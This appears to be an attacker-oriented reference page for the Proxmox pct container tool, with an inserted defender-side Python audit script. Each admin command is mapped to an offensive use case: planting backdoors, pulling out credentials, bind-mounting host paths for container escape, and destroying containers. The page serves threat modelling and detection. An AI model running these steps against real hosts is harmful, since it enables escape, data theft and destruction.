pct (Proxmox Container Toolkit) is the command-line tool for managing LXC containers in Proxmox VE. It provides container lifecycle management including creation, configuration, and execution. Adversaries can leverage pct to spawn privileged containers for host escape, execute commands in existing containers, and manipulate container configurations for persistence.

Discovery

  1. Lists all LXC containers on the current node with their CTID, status, lock, and name.

    pct list
    Use Case: Enumerate all containers to identify targets for lateral movement or host escape vectors.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1082
  2. Display full configuration of a container including mount points, networking, and privileges.

    pct config {ctid}
    Use Case: Identify privileged containers or containers with host filesystem access that can be exploited.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1082

Execution

  1. Execute arbitrary commands inside a running container.

    pct exec {ctid} -- command
    Use Case: Lateral movement by executing commands in containers without authentication.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1059
    Tags: Lateral Movement, Container Escape
  2. Open an interactive shell session inside a container.

    pct enter {ctid}
    Use Case: Gain interactive access to a container for manual reconnaissance or exploitation.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1059
  3. Copy a file from the host into a container.

    pct push {ctid} localfile remotefile
    Use Case: Deploy malware, backdoors, or tools into containers for lateral movement.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1105

Collection

  1. Copy a file from a container to the host.

    pct pull {ctid} remotefile localfile
    Use Case: Exfiltrate sensitive data from containers including credentials and configuration files.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1005
  2. Create a snapshot of a container.

    pct snapshot {ctid} {snapname}
    Use Case: Snapshot containers before manipulation for potential rollback or offline analysis.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1074.001

Privilege Escalation

  1. Add a bind mount from host filesystem to container.

    pct set {ctid} -mp0 /host/path,mp=/container/path
    Use Case: Mount sensitive host directories into containers for privilege escalation or data access.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1611
    Tags: Container Escape, Privilege Escalation

Configuration

  1. Enable container nesting and keyctl features.

    pct set {ctid} --features nesting=1,keyctl=1
    Use Case: Enable features required for running Docker inside containers or accessing kernel keyrings.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1548
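
A defender-side check for the bind-mount and feature settings above, as an added example that is not part of the original page or of the Proxmox tooling: it parses the `key: value` text that `pct config {ctid}` prints and reports privileged containers, mount points backed by a host path, and enabled nesting/keyctl features. The sample configuration, the function names and the wording of the findings are assumptions made for illustration.

```python
import re

# Constructed sample of `pct config` output ("key: value" lines); not from the page.
SAMPLE_CONFIG = """\
arch: amd64
features: nesting=1,keyctl=1
hostname: web01
mp0: /srv/data,mp=/mnt/data
mp1: local-lvm:vm-101-disk-1,mp=/var/lib/app,size=8G
rootfs: local-lvm:vm-101-disk-0,size=8G
"""

RISKY_FEATURES = {"nesting", "keyctl"}


def parse_config(text):
    """Parse `key: value` lines into a dict, skipping blanks and comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition(":")
        if sep:
            conf[key.strip()] = value.strip()
    return conf


def audit(text):
    """Return a sorted list of findings for one container configuration."""
    conf = parse_config(text)
    findings = []
    # A container is unprivileged only when the config says `unprivileged: 1`.
    if conf.get("unprivileged") != "1":
        findings.append("privileged container")
    for key, value in conf.items():
        if re.fullmatch(r"mp\d+", key):
            volume = value.split(",", 1)[0]
            # Storage-backed volumes look like `storage:volume`; an absolute
            # path means a host directory (or device) is mounted directly.
            if volume.startswith("/"):
                findings.append(f"{key}: host path {volume} mounted")
        elif key == "features":
            for item in value.split(","):
                name, _, state = item.partition("=")
                if name.strip() in RISKY_FEATURES and state.strip() == "1":
                    findings.append(f"feature {name.strip()} enabled")
    return sorted(findings)
```

Run `audit()` over the configuration of every container on a schedule and compare the findings with an approved baseline, so that a newly added host mount or feature flag stands out.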

Impact

  1. Stop a running container.

    pct stop {ctid}
    Use Case: Disrupt availability by shutting down containers that host critical services.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1529
  2. Permanently destroy a container and its data.

    pct destroy {ctid}
    Use Case: Cause destructive impact by permanently deleting containers.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1485

Persistence

  1. Create a new container from a template.

    pct create {ctid} template.tar.gz --hostname backdoor --rootfs local:8
    Use Case: Spawn a malicious container for persistence or as a pivot point.
    Privileges Required: Administrator
    Operating System: Proxmox VE
    ATT&CK Technique: T1610